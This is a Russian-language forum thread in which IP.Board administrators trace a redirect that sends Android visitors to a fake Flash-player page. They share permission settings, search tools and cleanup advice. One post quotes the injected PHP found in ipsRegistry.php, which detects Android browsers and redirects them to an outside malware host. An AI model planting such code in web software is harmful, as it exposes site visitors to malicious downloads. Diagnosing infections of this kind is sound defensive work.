Вредносной код на сайте / перекидывает ну чужой сайт

[Respected]

/admin/ 0755

/cache/ 0777

/cache/lang_cache 0777

/cache/lang_cache/1/ 0777

/cache/skin_cache/ 0777

/cache/tmp/ 0777

/converge_local/ 0755

/hooks/ 0777

/interface/ 0755

/ips_kernel/ 0755

/lofiversion/ 0755

/public/style_images/ 0777

/public/style_css/ 0777

uploads 0777

conf_global.php 0777

 

Для начала нужно выяснить куда перекидывает.

[St1L75]

Никуда не перекидывает, и слава Богу. Я хотел сделать это в качестве профилактики. Однако, на всех папках у меня установлено 755, а на всех файлах 644. При этом всё прекрасно работает. Может, стоит именно до такой степени перекрывать доступ?

[Respected]

Разработчик рекомендует. По желанию так сказать  

[ttindex]

Respected, Паша, моих пользователей перекидывает на сайт _www.kirkdavidson.com 

[Respected]

Папка cache чистая? Файлов с подозрительным названием не замечено?

[ttindex]

а папке cache много файлов. Паш, глянь лучше сам.

[ttindex]

и парни говорят что проблема толко у тех, у кого телефон на andorid, у других вроде все ок

[ttindex]

Вот полная ссылка вируса куда перекидывает www.kirkdavidson.com/js/fp.html

Вот тут ребята тоже разбирались, походу у них сидит, но так и не разобрались: тынц

[ttindex]

Народ? ну помогите у меня никто с андройда зайти на сайт не может, перекидывает на сайт что описано выше и просит установить флеш плеер.

[Respected]

По вирусчекеру ничего не обнаружено. 

Если везде искал, могу посоветовать лишь слить базу и искать по названию сайта, если не поможет - сливать все файлы форума и искать уже по ним.

[ttindex]

Какой прогой искать?

[Respected]

Какой прогой искать?

Folder Find Text

[dev1]

попробуйте вот этим скриптом поискать revisium.com/ai/

лично меня уже спасал не раз

[ttindex]

Folder Find Text

 

Скачал сайт на комп, ввел поиск и нашел этот код в папке big-benz.ru/admin/sources/base/ipsRegistry.php

 

Содержание в самом низу файла такое:

$mbrowser = mobile_device_detect();
$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;
if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {
    setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");
    header("Location: __www.kirkdavidson.com/js/fp.html");
    exit;
}

[Respected]

Ну вот, а ты панику бил  

Замени этот файл оригинальным с той же версии IP.Board

[ttindex]

Respected, заменил 

[ttindex]

После того как заменил на форуме вылезла ошибка

Fatal error: Cannot redeclare mobile_device_detect() (previously declared in /home/bigbenz/data/www/big-benz.ru/admin/sources/base/ipsController.php:480) in /home/bigbenz/data/www/big-benz.ru/cache/skin_cache/cacheid_26/skin_global.php on line 2100

 

пришлось возвращать старый файл

[_Dark_]

Замените этот файл, затем admin/sources/base/ipsController.php, затем перестройте кэш стилей.

[Sergey]

Столкнулся с аналогичной проблемой сегодня, тоже редирект на киркдавдисона... Тот же самый файл... закоментил код, посмотрим, что будет.

Узнать бы как себя обезопасить от подобных вставок кода в файлы форума... Есть соображения?

[_Dark_]

Использовать последние версии форума и устанавливать актуальные патчи безопасности.

[Sergey]

Использовать последние версии форума и устанавливать актуальные патчи безопасности.

Ну, патчи ставим по мере поступления, тут уже даже не от меня зависит. Их поступление должен отслеживать человек, ответственный за форумы (в данном случае это не совсем я=) ), поэтому не всё удаётся сделать своевременно. Зато потом приходится оперативно искать баги, "ковырякаться" =).

А в целом идея с последними версиями и патчами - само самой разумеется.

Народную медицину в виде скриптов-самописок не приветствуете?

[_Dark_]

Народную медицину в виде скриптов-самописок не приветствуете?

От этой народной медицины может стать и ещё хуже, так что не советую как раз ничего делать этим путём.

[Sergey]

Забавная вещь вышла. Опять появился редирект... Тот же на давидсона и там же. Исправил, пошёл ковырять, чтобы что-нибудь найти. Наткнулся на понял, что делал почти аналогичные действия с теми же самыми файлами-картинками и никак не мог найти ответа в интернете, собственно в то же время и зарегистрировался тут, чтобы попытаться найти ответы, но увы и ах (ну что и не удивительно, ведь статья вышла позже). В итоге зачитал ещё что спасибо отдельное), полез в cashe и отрыл там ещё один вирь(к слову не sh.php, а просто абракадабра.php), который был незамедлительно удалён...

Жду новых поступлений...

[_Dark_]

Патчи безопасности необходимо было ставить.

Если вы уже установили все патчи безопасности — все в порядке.